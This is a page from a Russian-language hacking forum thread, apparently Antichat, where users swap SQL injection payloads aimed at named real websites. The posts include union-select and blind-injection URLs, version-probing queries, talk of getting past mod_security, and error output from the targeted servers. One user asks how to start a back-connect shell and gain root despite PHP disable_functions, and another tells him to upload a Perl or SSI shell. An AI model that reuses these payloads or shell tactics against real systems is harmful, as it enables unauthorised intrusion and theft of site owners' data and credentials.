Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 586 of 1207
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    PHP :)))

    id=123456768+union+select+1+--+
    12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.
     
    #11701 Ctacok, 10 Mar 2010
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Как выполнить комманду,если
    Code:
    disable_functions	system,exec,passthru,shell_exec,posix_getpwuid,cmd,escapeshellcmd,popen,proc_open,ini_restore,dbmopen,suexec,show_source,escapeshellarg,set_time_limit,set_memory_limit
    php 5.2.5
     
    #11702 .:[melkiy]:., 10 Mar 2010
    Last edited: 10 Mar 2010
  3. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    2.:[melkiy]:.
    а может попробуешь загрузить перловый или SSI шелл!
    SSI шелл дето здесь на ачате лежит!
     
    #11703 Rubaka, 10 Mar 2010
    1 person likes this.
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Что-то ты какую-то хрень непонятную написал)
    У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
     
    #11704 Seravin, 10 Mar 2010
  5. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Пробывал

    У меня и так есть доступ к файлам. Нужно просто запустить бэк-коннект, чтобы порутать.Но комманды не пашут ибо:
    Code:
    disable_functions	system,exec,passthru,shell_exec,posix_getpwuid,cmd,escapeshellcmd,popen,proc_open,ini_restore,dbmopen,suexec,show_source,escapeshellarg,set_time_limit,set_memory_limit
    Причем тут fopen и тп? Оо

    safe mode Off
     
    #11705 .:[melkiy]:., 10 Mar 2010
  6. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Не о том подумал =\
    Я думал про фильтрацию числе.

    Ну если на union, можно как слепую.
     
    #11706 Ctacok, 10 Mar 2010
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    ну это понятно, но тут второй косяк: фильтрация на from ещё...
     
    #11707 Seravin, 10 Mar 2010
  8. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    оказывается там не фильтрация... что-то очень хитрое, чего я догнать не могу

    такой запрос проходит
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37/*from*/+and+ascii(substring((select+version()),1,1))=53
    значит всё-таки запрос обрабатывается

    Я вот думаю, может это как-то сервер хитро настроен?

    запрос:
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
    проходит, а в связке с select выдаёт ошибку(с union+all+select тоже)
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select
    Получается не ищется вхождение подстроки 'union' и 'from'.
    Также 'union' и 'from' не вырезается из строки, потому что
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
http://www.gtbit.org/news/viewitem.php?id=37+and+1=1+union
    выдаёт ошибку мускуля

    самое интересное то, что когда пишешь:
    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select
    то он выдаёт ошибку

    Code:
    Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    а при union без select
    Code:
    
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtbitor/public_html/news/viewitem.php on line 45
    Почему такая реакция?
     
    #11708 Seravin, 10 Mar 2010
    Last edited: 10 Mar 2010
  9. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    тоже одинаковый результат
     
    #11709 YuNi|[c, 10 Mar 2010
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Seravin:

    mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

    http://opennet.ru/base/sec/mod_security2.txt.html
    http://forum.ovh.com/archive/index.php/t-30298.html

    почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

    а на что-то типо:

    Code:
    http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((select+version()),1,1))=53
    он тебе и так по русски пишет - Warning, потому что неправильный синтаксис
     
    #11710 Pashkela, 10 Mar 2010
    3 people like this.
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    там не form, а /*form*/, но за ответ спасибо, почитаю
     
    #11711 Seravin, 10 Mar 2010
  12. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    YuNi|[c,
     
    #11712 l1ght, 10 Mar 2010
    3 people like this.
  13. Sharsky

    Sharsky New Member

    Joined:
    3 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

    Вот запрос:

    Логин и пасс админа не выводит...
     
    #11713 Sharsky, 10 Mar 2010
  14. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    ~mooncat~sql~netservice~
    LIMIT+1,1--
    ~cons1~cons~Консультант
     
    #11714 Дирижабль, 10 Mar 2010
  15. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    уже не надо этот скул
     
    #11715 YuNi|[c, 10 Mar 2010
  16. Sharsky

    Sharsky New Member

    Joined:
    3 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    [Feldmarschall], ничего не выводит =(
     
    #11716 Sharsky, 10 Mar 2010
  17. Sharsky

    Sharsky New Member

    Joined:
    3 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Удалил все пробели, все ровно не выводит. Вы проходили по ссыле? Посмотрите сами.
     
    #11717 Sharsky, 10 Mar 2010
  18. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Подскажите, почему не отображаются данные?
    Code:
    http://www.spbpost.ru/index.php?page_id=69+union+select+1,2,3,4,5,6,7,8,9,concat%28user%28%29,database%28%29%29,11,12,13,14,15,16,17+limit+1,1+--+
     
    #11718 CyberHunter, 10 Mar 2010
  19. Sharsky

    Sharsky New Member

    Joined:
    3 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    CyberHunter, надо указать базу и таблицу откуда хотите вывести данные.
     
    #11719 Sharsky, 10 Mar 2010
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Я хочу спросить почему не выводится " USER(), DATABASE() и т.д. "?
     
    #11720 CyberHunter, 10 Mar 2010
(You must log in or sign up to post here.)
Page 586 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.